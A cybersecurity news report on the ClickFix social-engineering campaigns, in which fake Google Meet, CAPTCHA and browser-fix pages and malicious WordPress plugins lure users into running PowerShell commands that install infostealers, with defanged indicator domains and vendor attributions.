Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
"This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in a report shared with The Hacker News.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported widely in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell code to address a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as potentially Zoom -
- meet.google.us-join[.]com
- meet.googie.com-join[.]us
- meet.google.com-join[.]us
- meet.google.web-join[.]com
- meet.google.webjoining[.]com
- meet.google.cdm-join[.]us
- meet.google.us07host[.]com
- googiedrivers[.]com
- us01web-zoom[.]us
- us002webzoom[.]us
- web05-zoom[.]us
- webroom-zoom[.]us
On Windows, the attack chain culminates in the deployment of StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic.
This emerging social engineering tactic is notable for the fact that it cleverly evades detection by security tools, as it involves the users manually running the malicious PowerShell command directly on the terminal, as opposed to being automatically invoked by a payload downloaded and executed by them.
Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.
"Both traffers teams [...] use the same ClickFix template that impersonates Google Meet," Sekoia said. "This discovery suggests that these teams share materials, also known as 'landing project,' as well as infrastructure."
This, in turn, has raised the possibility that both the threat groups are making use of the same, as-yet-unknown cybercrime service, with a third-party likely managing their infrastructure.
The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
"The rise of open-source infostealers represents a significant shift in the world of cyber threats," cybersecurity company Hudson Rock noted back in July 2024.
"By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."
ClickFix Delivers Lumma Stealer; Targets WordPress Sites
Cybersecurity company Qualys has detailed a new ClickFix campaign that leverages CAPTCHA-verification lures on fake websites to trick users into copying and executing a Base64-encoded PowerShell script using the Run dialog box in Windows.
The PowerShell script is configured to retrieve a remote payload, which, in turn, executes another PowerShell script to download and run Lumma Stealer by means of a technique known as process hollowing to evade detection.
"The investigation into Lumma Stealer reveals an evolving threat landscape characterized by the malware's ability to adapt and evade detection," Qualys researcher Vishwajeet Kumar said. "It employs a variety of tactics, from leveraging legitimate software to utilizing deceptive delivery methods, making it a persistent challenge for security teams."
GoDaddy and its Sucuri subsidiary have also warned that these ClickFix campaigns are targeting WordPress sites using malicious plugins (e.g., Advanced User Manager, Quick Cache Cleaner, and universal-popup-plugin-v133) to deliver deceptive browser fix popup messages.
"The popup instructs the user to 'install the root certificate' by clicking on a fake button labeled How to Fix," security researcher Puja Srivastava said. "Upon clicking this button, a new pop-up appears with detailed instructions for running malicious commands on PowerShell."
"Users who unknowingly execute this PowerShell script end up downloading and running a trojan, which can have severe consequences, such as data theft, remote control of the machine, and/or further exploitation."
More than 6,000 WordPress sites are estimated to have been infected in the manner to date, with the threat actors leveraging stolen admin credentials to install the rogue plugins. There is evidence to suggest that there is some level of automation involved to create the plugins owing to the consistency in naming conventions and metadata.
It isn't currently clear how the WordPress admin credentials are obtained in the first place, but potential vectors include brute-force attacks, phishing, and information stealer campaigns aimed at acquiring usernames and passwords.
"Once installed, the plugins inject malicious JavaScript containing a known variation of fake browser update malware that uses blockchain and smart contracts to obtain malicious payloads," Denis Sinegubko said. "When executed in the browser, JavaScript presents users with fake browser update notifications that guide them to install malware on their computer."
Fake CAPTCHA Checks Leads to Lumma and Amadey Trojan
Cybersecurity company Kaspersky has revealed that web pages hosting fake CATCHA checks are being used to propagate Lumma Stealer and Amadey, an information stealer that can also deliver next-stage payloads like Remcos RAT, as part of a new ClickFix campaign.
"From September 22 to October 14, 2024, [...] over 20,000 users were redirected to infected sites, where some of them saw a fake update notification or a fake CAPTCHA," it said in a report published on October 29, 2024. "Users in Brazil, Spain, Italy, and Russia were most frequently affected."
ClickFix's Widespread Adoption
Sekoia, in a follow-up report released on November 5, 2024, said that multiple intrusion sets have adopted the ClickFix technique to distribute malware through email phishing campaigns, compromised websites, and distribution infrastructures. This includes the Russia-linked APT28 actor, which has employed the method to drop PowerShell malware to harvest data in attacks targeting Ukraine.
(The story has been updated after publication to include additional information shared by several cybersecurity vendors about the ClickFix campaigns.)